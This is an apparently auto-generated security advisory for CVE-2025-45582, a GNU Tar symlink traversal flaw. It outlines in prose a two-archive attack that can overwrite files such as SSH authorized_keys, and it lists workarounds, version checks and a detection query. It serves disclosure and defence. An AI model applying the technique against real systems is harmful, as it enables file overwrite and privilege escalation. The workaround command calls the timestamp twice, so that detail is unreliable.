CVE-2025-45582
📋 TL;DR
GNU Tar through version 1.35 contains a directory traversal vulnerability that allows file overwrite via a two-step process using crafted TAR archives. Attackers can exploit this by first extracting an archive with a symlink to a critical directory, then extracting another archive with files that follow that symlink path. This primarily affects server applications that automatically extract user-supplied archives and software installation processes that run 'tar xf' multiple times in the same directory.
💻 Affected Systems
- GNU Tar
📦 What is this software?
Tar by Gnu
⚠️ Risk & Real-World Impact
Worst Case
Critical system files could be overwritten, leading to privilege escalation, data destruction, or backdoor installation (e.g., overwriting SSH authorized_keys, system binaries, or configuration files).
Likely Case
Unauthorized file modification in user-writable directories, potentially compromising user data or application integrity in multi-user systems.
If Mitigated
Limited to file overwrite in directories where the user already has write permissions, with no privilege escalation beyond existing access.
🎯 Exploit Status
Exploit requires creating two specific archives and getting victim to extract them in sequence. Public proof-of-concept exists in vulnerability database references.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Not yet released
Vendor Advisory: https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html
Restart Required: No
Instructions:
Monitor GNU Tar releases for patch. Currently no official fix available. Consider workarounds below.
🔧 Temporary Workarounds
Extract to unique directories
linuxAlways extract TAR archives to unique, empty directories to prevent symlink traversal between extractions.
mkdir -p /tmp/extract_$(date +%s) && tar xf archive.tar -C /tmp/extract_$(date +%s)
Use --one-top-level option
linuxExtract archives to a dedicated subdirectory using tar's built-in option.
tar xf archive.tar --one-top-level=extracted_files
🧯 If You Can't Patch
- Implement strict input validation: reject any user-supplied TAR archives containing symlinks or paths with '..' components.
- Run tar extraction processes with minimal privileges and in isolated environments (containers/chroots) to limit potential damage scope.
🔍 How to Verify
Check if Vulnerable:
Check tar version: tar --version | head -1. If version is 1.35 or earlier, system is vulnerable when used in multi-extraction scenarios.Check Version:
tar --version | head -1Verify Fix Applied:
Once patched version is available, verify with: tar --version | grep -q '1.36' && echo 'Patched' || echo 'Vulnerable'📡 Detection & Monitoring
Log Indicators:
- Multiple tar extraction operations in same directory within short timeframes
- Tar operations with user-supplied archive names
- Failed file write attempts to protected directories
Network Indicators:
- Uploads of TAR archives to web applications or file transfer services
SIEM Query:
process.name="tar" AND command_line="*xf*" | stats count by host, command_line | where count > 1🔗 References
- https://github.com/i900008/vulndb/blob/main/Gnu_tar_vuln.md
- https://lists.gnu.org/archive/html/bug-tar/2025-08/msg00012.html
- https://www.gnu.org/software/tar/
- https://www.gnu.org/software/tar/manual/html_node/Integrity.html
- https://www.gnu.org/software/tar/manual/html_node/Security-rules-of-thumb.html
- http://www.openwall.com/lists/oss-security/2025/11/01/6
